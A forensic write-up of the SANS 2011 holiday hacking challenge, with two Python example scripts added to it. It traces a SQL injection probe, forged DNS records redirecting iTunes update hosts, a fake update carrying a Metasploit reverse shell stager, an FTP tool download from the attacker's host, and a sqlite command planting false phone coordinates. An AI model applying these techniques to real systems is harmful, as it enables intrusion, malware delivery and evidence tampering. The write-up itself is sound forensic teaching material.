SANS Christmas Hacking Challenge 2011

Johnny Vestergaard ([email protected])

January 3, 2012

Contents

1 Overview 21.1 Significant events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21.2 Attack visualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

2 Analysis 32.1 Hosts analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

2.1.1 IP 192.168.1.10 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32.1.2 IP 172.19.79.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32.1.3 IP 172.19.89.6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

2.2 Detailed analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52.2.1 #1 - Email from Grandma to Mel . . . . . . . . . . . . . . . . . . 52.2.2 #2 - Probing of web server . . . . . . . . . . . . . . . . . . . . . . 62.2.3 #3 - SQL injection (DNS Poisoning) . . . . . . . . . . . . . . . . . 72.2.4 #4 - Infection of Rudolphs computer . . . . . . . . . . . . . . . . . 10

3 Answers to challenge questions 14

1

1 Overview

1.1 Significant events

Table 1 provides a summary of the most significant events identified and analyzed on the following pages.

#  Time   Event
1  13:51  Email from Grandma to Mel revealing a plot to fake her own death and frame Rudolph for her murder; the mail carries hidden content which reveals where Grandma will hide out.
2  13:51  Probing of the web server; the attacker finds that the server is vulnerable to SQL injection (source 192.168.1.10).
3  13:52  SQL injection on the web server: injection of data which results in specific apple.com hosts resolving to 192.168.1.10 (DNS poisoning).
4  13:57  Rudolph's computer tries to update iTunes but, due to the DNS poisoning, is redirected to a service provided by the attacker, which serves a piece of malware. The attacker uses it to inject a set of coordinates (40.7715,-73.978833) into a backup of Rudolph's cellular phone.

Table 1: Significant events

1.2 Attack visualization

Based on the analysis in section 2 the following visualization has been generated. It is largely self-explanatory and is included as an easy way to grasp how the attack was orchestrated.

Figure 1: Attack visualization. Hosts: Attacker 192.168.1.10 (Grandma); Mail Server 192.168.1.3; DNS and Web Server 172.19.79.2; Target 172.19.79.6 (Rudolph). Flows: Attacker -> Mail Server: mail with hidden content (Grandma -> Mel). Attacker -> DNS and Web Server: DNS poisoning (SQL injection). Target -> DNS and Web Server: uses DNS. Target <-> Attacker: get iTunes update, reverse shell, get sqlite.exe (ftp). On Target: change iPhone coordinates, delete sqlite.exe.

2 Analysis

An in-depth analysis of the most significant hosts and events found in the provided packet dump.

2.1 Hosts analysis

Form, identity and miscellaneous information on the most prominent hosts active in the packet dump; this provides a reference point for the further analysis done in 2.2.

2.1.1 IP 192.168.1.10

According to headers extracted from email and HTTP, this host appears to be running a Linux i686 variant as OS, using Firefox as browser (see snippet 1, lines 2 and 3) and Alpine as email client. Furthermore it appears that the operator of 192.168.1.10 is working from an administrative account (root) and that the operator is known as "Grandma" (see snippet 2, lines 2, 3, 4 and 5). Both the User-Agent and the mail headers are client-supplied and trivially forged, so they are an indication of the platform and operator, not proof.

Snippet 1 HTTP client headers from 192.168.1.10

1 GET / HTTP/1.1
2 Host: www.santaslist.northpole
3 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

Snippet 2 Email headers from 192.168.1.10

1 Date: Sun, 25 Dec 2011 07:42:26 -0500 (EST)
2 From: Grandma <[email protected]>
3 X-X-Sender: root@bt
4 To: [email protected]
5 Subject: Christmas
6 Message-ID: <alpine.DEB.2.02.1112250741440.7396@bt>
7 User-Agent: Alpine 2.02 (DEB 1266 2009-07-14)
8 MIME-Version: 1.0
9 Content-Type: MULTIPART/MIXED; BOUNDARY="0-471592043-1324816946=:7396"

2.1.2 IP 172.19.79.2

Web server serving www.santaslist.northpole, running Apache 2.2.15 on CentOS and using PHP 5.3.2 (see snippet 3).

Snippet 3 HTTP headers from webserver www.santaslist.northpole

HTTP/1.1 200 OK
Date: Sun, 25 Dec 2011 12:52:58 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2

2.1.3 IP 172.19.89.6

According to headers extracted from HTTP requests (see snippet 4), this system is running Windows XP Professional SP3 and has an outdated version of iTunes installed (10.3.1). Furthermore, path naming and username information were found which indicate that the owner of this system is named Rudolph, as shown in snippet 5.

Snippet 4 HTTP header from 172.19.89.6

GET /bag.xml?ix=4 HTTP/1.1
User-Agent: iTunes/10.3.1 (Windows; Microsoft Windows XP Professional Service Pack 3 (Build 2600)) AppleWebKit/533.21.1

Snippet 5 Indications of identity on 172.19.89.6

C:\Documents and Settings\Rudolph\Application Data\Apple Computer\MobileSync\Backup\e409a4c01ece2a9e6bf9267b169f3b15616b98cd>ftp -A 192.168.1.10
[...]
Anonymous login succeeded for Rudolph@RUDOLPH-PC

2.2 Detailed analysis

This section provides a detailed analysis of each significant event listed in table 1.

2.2.1 #1 - Email from Grandma to Mel

At 13:51 an email was sent from Grandma to Mel. At first glance this mail appears to contain only a mail message (snippet 6) and a MIME-embedded Word document (content shown in snippet 7); however, during forensic analysis of the Word document a hidden message from Grandma was detected in the comment property of the metadata affiliated with the document, as shown in snippet 8.

Snippet 6 Text content of mail from Grandma to Mel

Dear Mel,

Our plans are almost complete, and I am very excited. Soon, you and I
shall be spending the rest of our days relaxing in the surf and sun!
The plan is highly sensitive, a deep secret that only the two of us share.
Never tell another soul about our clever scheme as long as you live.
As we discussed, I recently made you the sole beneficiary of my life
insurance policy. On Christmas Eve, I plan on faking my own death, which
I will frame as murder on Rudolph, Santa's obnoxious reindeer.

The details of my plan are included in the attached document below. Read
it carefully.

Merry Christmas!

Grandma

Snippet 7 Content of attached file in mail from Grandma to Mel

Dear Mel,

Here are the details of my secret plan.

After the investigation turns up the evidence I plant, you provide eyewitness testimony in court, and Rudolph is convicted, you will receive the insurance payout. We can then use that money to fund our Caribbean retirement.

I am not sure I ever told you this, Mel, but as a child, my village was attacked by a ravenous band of rampaging reindeer, instilling a life-long hatred in me for the flea-bitten beasts. I'll never forget their horrible comments as they galloped through our village. Because of that chilling childhood experience, I'm going to fake my death and blame it all on Rudolph, the most well-known reindeer of all. He'll rot away in jail forever.

Merry Christmas,

Grandma

Snippet 8 Message hidden in file comment of attached file

I will hide out at the Plaza Hotel near Central Park for several weeks, and meet you there in the lobby exactly one week after the trial concludes with a guilty verdict for Rudolph, precisely at noon local time. Make sure you bring the money in a suitcase full of cash. I'll be wearing one red shoe.

2.2.2 #2 - Probing of web server

Soon after sending the mail mentioned above, the attacker launched a series of probes against the web server (172.19.79.2). Initially the attacker issued a few HTTP probes, shown in snippet 9; the purpose of these probes is assessed to be information gathering and identification of vulnerabilities. The attacker successfully identified a SQL injection vulnerability by submitting a single quote (URL-encoded as %27, hex value 27) as the value of the name parameter in the naughty list form; the server response suggesting this vulnerability is shown in snippet 10. Note that the application returns the raw MySQL error message to the client, which is what makes the flaw detectable from a single request.

Snippet 9 Generic probing

• GET / HTTP/1.1
• POST /checklist.php HTTP/1.1
  – name=Grandma
  – name=Cousin+Mel
  – name=%27

Snippet 10 SQL Injection probe

HTTP/1.1 200 OK
Date: Sun, 25 Dec 2011 12:53:28 GMT
Server: Apache/2.2.15 (CentOS)
<-- CUT -->
<tr><th>Name</th><th>Status</th></tr>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1</table>
</body></html>

2.2.3 #3 - SQL injection (DNS Poisoning)

The attacker starts out by injecting a few SELECT queries to identify the data and schema already stored in the database; the results are displayed, enumerated in the naughty list, as shown in figure 2. After a few queries the attacker is able to reconstruct the relevant parts of the DNS database, as shown in table 2a. The attacker then injects a single Start of Authority (SOA) record into the MyDNS soa table stating that the origin apple.com is served by ns1.santaslist.northpole, which in plain English states that ns1.santaslist.northpole is the authoritative place to look up *.apple.com host names. Lastly a series of apple.com hosts are injected into the Resource Record (rr) table stating that the specified hosts resolve to 192.168.1.10. Again in plain English, this states that when a client looks up one of the injected host names it will resolve to 192.168.1.10, which is the IP of the attacker. A full overview of the soa and rr tables after the attacker has successfully conducted the DNS poisoning is shown in table 2b.

Figure 2: HTML feedback after SQL injection of SELECT statement


(a) DNS tables before SQL injection

Original soa table
ID  ORIGIN                NS                        MBOX                       SERIAL  REFRESH  RETRY  EXPIRE  MINIMUM  TTL
1   santaslist.northpole  ns1.santaslist.northpole  root.santaslist.northpole  25      28800    7200   604800  86400    86400

Original rr table
ID  ZONE  NAME                      TYPE  DATA                      AUX  TTL
1   1     @                         NS    ns1.santaslist.northpole  0    86400
2   1     ns1.santaslist.northpole  A     172.19.79.2               0    86400
3   1     www.santaslist.northpole  A     172.19.79.2               0    86400

(b) DNS tables after SQL injection

Modified soa table
ID  ORIGIN                NS                        MBOX                       SERIAL  REFRESH  RETRY  EXPIRE  MINIMUM  TTL
1   santaslist.northpole  ns1.santaslist.northpole  root.santaslist.northpole  25      28800    7200   604800  86400    86400
2   apple.com             ns1.santaslist.northpole  root.santaslist.northpole  1       28800    7200   604800  86400    86400

Modified rr table
ID  ZONE  NAME                      TYPE  DATA                      AUX  TTL
1   1     @                         NS    ns1.santaslist.northpole  0    86400
2   1     ns1.santaslist.northpole  A     172.19.79.2               0    86400
3   1     www.santaslist.northpole  A     172.19.79.2               0    86400
4   2     itunes.apple.com          A     192.168.1.10                   86400
5   2     ax.init.itunes.apple.com  A     192.168.1.10                   86400
6   2     swcatalog.apple.com       A     192.168.1.10                   86400
7   2     swcdn.apple.com           A     192.168.1.10                   86400
8   2     swscan.apple.com          A     192.168.1.10                   86400

Table 2: DNS tables before and after malicious modification.
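The following Python script is an added example and is not part of the original submission, nor code from MyDNS or the santaslist web application. It rebuilds the soa and rr tables of table 2 in an in-memory SQLite database, reproduces the single-quote probe of snippet 10 (section 2.2.2) against a constructed stand-in for checklist.php, and then shows why the injected rows of section 2.2.3 matter: a MyDNS-style lookup that selects the zone by longest matching origin returns 192.168.1.10 for the poisoned apple.com hosts while www.santaslist.northpole still resolves normally. The real PHP source is not on the page, so the string-concatenated query and the naughty table rows are assumptions; the exact INSERT payloads the attacker used are not shown either, so the script applies the rows of table 2b directly rather than guessing the injection string.

```python
import sqlite3

# Constructed in-memory replica of the MyDNS tables from table 2a/2b. Only the
# columns a lookup needs are kept; the real soa/rr tables carry more (see table 2).
ORIGINAL_SOA = [(1, "santaslist.northpole", "ns1.santaslist.northpole")]
ORIGINAL_RR = [
    (1, 1, "@", "NS", "ns1.santaslist.northpole"),
    (2, 1, "ns1.santaslist.northpole", "A", "172.19.79.2"),
    (3, 1, "www.santaslist.northpole", "A", "172.19.79.2"),
]
# Rows the attacker added (table 2b): one SOA claiming apple.com, plus A records.
INJECTED_SOA = [(2, "apple.com", "ns1.santaslist.northpole")]
INJECTED_RR = [
    (4, 2, "itunes.apple.com", "A", "192.168.1.10"),
    (5, 2, "ax.init.itunes.apple.com", "A", "192.168.1.10"),
    (6, 2, "swcatalog.apple.com", "A", "192.168.1.10"),
    (7, 2, "swcdn.apple.com", "A", "192.168.1.10"),
    (8, 2, "swscan.apple.com", "A", "192.168.1.10"),
]
# Constructed naughty-list rows for checklist.php; the page does not show this table.
NAUGHTY = [("Grandma", "naughty"), ("Cousin Mel", "naughty")]


def build_db(poisoned):
    """Return a connection holding the DNS tables, with or without the injected rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE soa (id INTEGER PRIMARY KEY, origin TEXT, ns TEXT);"
        "CREATE TABLE rr (id INTEGER PRIMARY KEY, zone INTEGER, name TEXT, type TEXT, data TEXT);"
        "CREATE TABLE naughty (name TEXT, status TEXT);"
    )
    con.executemany("INSERT INTO soa VALUES (?,?,?)", ORIGINAL_SOA)
    con.executemany("INSERT INTO rr VALUES (?,?,?,?,?)", ORIGINAL_RR)
    con.executemany("INSERT INTO naughty VALUES (?,?)", NAUGHTY)
    if poisoned:
        con.executemany("INSERT INTO soa VALUES (?,?,?)", INJECTED_SOA)
        con.executemany("INSERT INTO rr VALUES (?,?,?,?,?)", INJECTED_RR)
    con.commit()
    return con


def checklist(con, name):
    """Stand-in for checklist.php (assumed: the MySQL syntax error in snippet 10
    shows the name parameter is spliced into the query text unescaped).
    Returns the rows the page would render, or the database error text."""
    query = "SELECT name, status FROM naughty WHERE name = '%s'" % name
    try:
        return con.execute(query).fetchall()
    except sqlite3.OperationalError as exc:
        return "SQL error: %s" % exc


def resolve_a(con, qname):
    """Approximation of MyDNS zone selection: pick the SOA whose origin is the
    longest suffix of the query name, then look for an A record in that zone
    stored either as the FQDN or as a zone-relative label. Returns None when
    the server is not authoritative or the name has no A record."""
    qname = qname.rstrip(".").lower()
    best = None
    for zone_id, origin in con.execute("SELECT id, origin FROM soa"):
        origin = origin.rstrip(".").lower()
        if qname == origin or qname.endswith("." + origin):
            if best is None or len(origin) > len(best[1]):
                best = (zone_id, origin)
    if best is None:
        return None
    zone_id, origin = best
    relative = "@" if qname == origin else qname[: -(len(origin) + 1)]
    row = con.execute(
        "SELECT data FROM rr WHERE zone = ? AND type = 'A' AND name IN (?, ?)",
        (zone_id, qname, relative),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    clean, poisoned = build_db(False), build_db(True)
    print(checklist(clean, "'"))
    for host in ("swcatalog.apple.com", "www.santaslist.northpole", "www.apple.com"):
        print(host, resolve_a(clean, host), resolve_a(poisoned, host))
```

One side effect worth knowing when hunting for this kind of tampering: the injected SOA makes the server claim the whole apple.com zone, so in this model any apple.com name without an injected A record (www.apple.com, for instance) gets an authoritative negative answer from the poisoned server instead of the real address, which can surface as other Apple services failing for clients that use it.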


2.2.4 #4 - Infection of Rudolph's computer

The infection process
The target is infected through a malicious iTunes update. The attacker has made arrangements, as described in 2.2.3, to make specific apple.com hosts resolve to his own machine (192.168.1.10), where he is hosting a malicious update service serving malware instead of legitimate updates; it is likely that the attacker is using EvilGrade [1] (or a similar tool) to facilitate this. The requests from the target's iTunes instance to the malicious update service are shown in table 3. An analysis of the traffic has shown that the target is using an old version of iTunes (10.3.1) which is vulnerable [2] to this specific attack vector, which allows download and execution of unsigned updates.

Client request                                              Intended host
GET /bag.xml?ix=4                                           ax.init.itunes.apple.com
GET /version?machineID=101a1a42c676ea68                     itunes.apple.com
GET /content/catalogs/others/index-windows-1.sucatalog      swcatalog.apple.com
GET /content/downloads/14/21/[SNIP]/061-4339.English.dist   swcatalog.apple.com
GET /iTunesSetup.exe                                        swcatalog.apple.com

Table 3: Update requests

The malware
After execution of the malware, the malware tries to connect back to the attacker on port 1225 using a standard TCP three-way handshake. After the connection is established the malware seemingly awaits stimulus before acting further; this stimulus was captured in the provided PCAP, shown in figure 3. When comparing this stimulus with the shell.rb source code of Metasploit, as shown in figure 4, it can be concluded with little doubt that the malware is a legitimate binary [3] wrapped with a Metasploit reverse_tcp stager, and that the actual stage used by the attacker is a shell.

[1] http://www.infobytesec.com/down/isr-evilgrade-Readme.txt
[2] Fixed in iTunes 10.5.1: http://support.apple.com/kb/HT5030?viewlocale=en_US
[3] Apache Bench, found by static analysis of the binary.

Figure 3: Malware stimulus (blue is attacker data, red is target data)

Figure 4: Metasploit source code (/modules/payloads/stages/windows/shell.rb)

A test was conducted in an isolated environment using two hosts: a Windows XP SP3 machine running the malware (extracted from the PCAP) and a BackTrack 5 R2 machine running Metasploit. As shown in figure 5, the test demonstrated that the malware actually works as described above.

Figure 5: Injection of shell payload.
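The staging exchange described above, as an added example rather than code from the submission or from Metasploit: the Windows reverse_tcp stager connects back, sends nothing of its own, and blocks until the handler pushes a 4-byte little-endian length followed by that many bytes of stage, which it then executes. The script below reproduces that framing over a local socket pair with a placeholder stage (the bytes of figure 3 are not reproduced on the page, so the stage contents here are invented) and adds a small stream-level check that flags a connection in which the client stays silent after the handshake and the server's first four bytes are a length matching the rest of its data. The execution step is replaced by simply returning the received bytes.

```python
import socket
import struct
import threading


def send_stage(sock, stage):
    """Attacker side: what a reverse_tcp handler does once the callback arrives.
    The Windows reverse_tcp stager expects a 4-byte little-endian length
    followed by the stage itself."""
    sock.sendall(struct.pack("<I", len(stage)) + stage)


def recv_exact(sock, n):
    """Read exactly n bytes or raise; the stager loops on recv the same way."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before the full stage arrived")
        buf += chunk
    return buf


def stager_receive(sock):
    """Target side minus execution: the stager sends nothing after connecting
    and blocks until the handler pushes the length-prefixed stage."""
    (length,) = struct.unpack("<I", recv_exact(sock, 4))
    return recv_exact(sock, length)


def is_reverse_tcp_staging(client_first_bytes, server_first_bytes):
    """Heuristic for a reassembled TCP stream (both directions): client silent,
    server opens with a little-endian uint32 equal to the size of what follows.
    A stage of a few hundred KB spans many segments, so run this on the
    reassembled payload, not on the first packet."""
    if client_first_bytes or len(server_first_bytes) < 4:
        return False
    (length,) = struct.unpack("<I", server_first_bytes[:4])
    return length > 0 and length == len(server_first_bytes) - 4


def demo():
    """Run handler and stager against each other over a socket pair."""
    attacker, target = socket.socketpair()
    stage = b"\x90" * 64 + b"CONSTRUCTED-STAGE"  # placeholder, not shellcode
    sender = threading.Thread(target=send_stage, args=(attacker, stage))
    sender.start()
    received = stager_receive(target)
    sender.join()
    attacker.close()
    target.close()
    return stage, received


if __name__ == "__main__":
    stage, received = demo()
    print("stage delivered intact:", stage == received)
    print("framing recognised:", is_reverse_tcp_staging(b"", struct.pack("<I", len(stage)) + stage))
```

The silence of the client before the stage arrives is exactly the "awaits stimulus" behaviour observed in the capture; it is also why a handler that is not listening leaves the implant hanging on the connection rather than failing loudly.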

Modification of coordinates on Rudolph's computer
At this point the attacker has shell access to Rudolph's computer, where he downloads a copy of sqlite3.exe from his own machine over FTP (see snippet 5). The attacker uses this tool to inject a set of coordinates into the backup of the cellular location database of Rudolph's phone, which is stored locally on Rudolph's computer inside the iTunes backup directory (the file name 4096c9ec... is the hashed backup name of the phone's consolidated.db location cache), and deletes the tool again afterwards (figure 1). The injected coordinates and timestamp match the crime scene [4], as shown in figure 6, which would lead a forensic investigator to the conclusion that Rudolph, or at least his phone, was at the crime scene when the alleged crime occurred.

Snippet 11 Command used to inject data

sqlite3 4096c9ec676f2847dc283405900e284a7c815836 "insert into CellLocation values(310,410,11250,116541837,346471200.820172,40.7715,-73.978833,1414,0,-1,-1,-1,50)"

The manipulated cellular location database is shown in snippet 12 (the injected data is shown on line 23). Note that the injected row reuses the timestamp of line 11 and sits after line 22 although its timestamp is earlier, two artifacts that give the manipulation away to anyone who checks the table for consistency.

[4] Crime-scene coordinates were extracted from the photo of the crime scene: http://pen-testing.sans.org/images/challenges/holiday/evidence.jpg

Snippet 12 Location database after malicious modification

1 310|410|11504|165415283|346413600.207493|90.0|0.0|1414.0|0.0|-1.0|-1.0|-1.0|50
2 310|410|11560|165415876|346417200.724667|-36.848461|174.763333|1414.0|0.0|-1.0|-1.0|-1.0|50
3 310|410|11913|165415988|346424400.845503|-33.87365|151.206889|1414.0|0.0|-1.0|-1.0|-1.0|50
4 310|410|11490|165415931|346431600.789114|35.689489|139.691706|1414.0|0.0|-1.0|-1.0|-1.0|50
5 310|410|11486|165415119|346433400.698928|40.332808|116.47765|1414.0|0.0|-1.0|-1.0|-1.0|50
6 310|410|11387|165415444|346435200.577698|39.904214|116.407414|1414.0|0.0|-1.0|-1.0|-1.0|50
7 310|410|11647|165415648|346449600.307924|55.752505|37.623168|1414.0|0.0|-1.0|-1.0|-1.0|50
8 310|410|11563|165415337|346458600.605536|52.523406|13.4114|1414.0|0.0|-1.0|-1.0|-1.0|50
9 310|410|11293|165419827|346460400.123529|48.858362|2.294242|1414.0|0.0|-1.0|-1.0|-1.0|50
10 310|410|11245|165415050|346464000.957372|51.505624|-0.075383|1414.0|0.0|-1.0|-1.0|-1.0|50
11 310|410|11341|165413757|346471200.820172|-22.903539|-43.209587|1414.0|0.0|-1.0|-1.0|-1.0|50
12 310|410|11146|165413900|346478400.428421|18.467964|-66.108809|1414.0|0.0|-1.0|-1.0|-1.0|50
13 310|410|11150|165413038|346480200.261264|6.42375|-66.58973|1414.0|0.0|-1.0|-1.0|-1.0|50
14 310|410|11342|165415572|346482000.116289|40.748245|-73.985534|1414.0|0.0|-1.0|-1.0|-1.0|50
15 310|410|11880|165413161|346483440.664151|43.653226|-79.383184|1414.0|0.0|-1.0|-1.0|-1.0|50
16 310|410|11537|165415788|346484520.528258|40.440625|-79.995886|1414.0|0.0|-1.0|-1.0|-1.0|50
17 310|410|11363|165415476|346485600.313375|41.8789|-87.63584|1414.0|0.0|-1.0|-1.0|-1.0|50
18 310|410|11686|165413799|346489201.224764|39.739094|-104.984898|1414.0|0.0|-1.0|-1.0|-1.0|50
19 310|410|11998|165414519|346492800.167865|37.819751|-122.478168|1414.0|0.0|-1.0|-1.0|-1.0|50
20 310|410|11312|165413083|346496400.422522|61.190009|-149.870694|1414.0|0.0|-1.0|-1.0|-1.0|50
21 310|410|11409|165413229|346500000.268656|21.307237|-157.858055|1414.0|0.0|-1.0|-1.0|-1.0|50
22 310|410|11504|165415284|346503600.473327|90.0|0.0|1414.0|0.0|-1.0|-1.0|-1.0|50
23 310|410|11250|116541837|346471200.820172|40.7715|-73.978833|1414.0|0.0|-1.0|-1.0|-1.0|50

Figure 6: Plot of injected coordinate and crime-scene. (green arrow - same location)


3 Answers to challenge questions

According to the packet capture file, what was Grandma's grand plan for Christmas day?
Fake her own death and frame Rudolph for her disappearance.

Why did the geo-location information on Rudolph's computer, synced from his cell phone, show that Rudolph was in Central Park during the attack? Please describe each technical step that led to this "evidence" presented in court.
Grandma, the über hacker, hacked Rudolph's computer and injected a set of coordinates into a software backup of Rudolph's cellular phone. The technical steps are described in section 2.2.

Where should the authorities look for Grandma?
In the Plaza Hotel near Central Park, see snippet 8.

Based on the evidence in the packet capture file, who is guilty in this story?
Dear old Grandma is guilty of framing Rudolph for her disappearance and of insurance fraud.